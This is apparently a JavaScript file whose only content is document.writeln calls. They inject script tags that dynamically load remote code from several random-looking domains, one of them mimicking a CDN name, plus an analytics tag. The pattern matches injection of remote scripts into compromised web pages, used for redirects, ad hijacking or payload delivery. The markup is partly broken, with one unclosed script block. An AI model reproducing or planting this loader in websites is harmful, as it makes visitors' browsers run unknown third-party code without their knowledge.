document.writeln("  </script>");
document.writeln("<script language=\'Javascript\' type=\'text/javascript\'>");
document.writeln("       (function() {");
document.writeln("          var hi = document.createElement(\'script\');");
document.writeln("          hi.src = \'https://thy.dacedsfa.cn/sakbLfv6?busd=1221\';");
document.writeln("          var k = document.getElementsByTagName(\'script\')[0];");
document.writeln("          k.parentNode.insertBefore(hi, k);");
document.writeln("        })();");
document.writeln("</script> ");
document.writeln("<script type=\'text/javascript\'>");
document.writeln("	(function() {");
document.writeln("	        var hi = document.createElement(\'script\');");
document.writeln("	        hi.src = \'https://vivovip.mmszxc.top/kyy/run.js?f=jw09\';");
document.writeln("	        hi.charset = \'UTF-8\';");
document.writeln("	        var k = document.getElementsByTagName(\'script\')[0];");
document.writeln("	        k.parentNode.insertBefore(hi, k);");
document.writeln("	})();");
document.writeln("</script>");
document.writeln("<script type=\'text/javascript\'>");
document.writeln("        (function() {");
document.writeln("            var hi = document.createElement(\'script\');");
document.writeln("            hi.src = \'//cdnjs.hugpai.com/LSz9qEn5br\';");
document.writeln("            var k = document.getElementsByTagName(\'script\')[0];");
document.writeln("            k.parentNode.insertBefore(hi, k);");
document.writeln("        })();");
document.writeln("<script type=\'text/javascript\'>");
document.writeln("(function() {");
document.writeln("var ms = document.createElement(\'script\');");
document.writeln("ms.src = \'//dmg.sybrowser.com/static/channel/tao03.js\';");
document.writeln("ms.charset = \'UTF-8\';");
document.writeln("var k = document.getElementsByTagName(\'script\')[0];");
document.writeln("k.parentNode.insertBefore(ms, k);");
document.writeln("})();");
document.writeln("</script>");
document.writeln("<script type=\"text/javascript\" src=\"https://s4.cnzz.com/z_stat.php?id=1279593467&web_id=1279593467\"></script>");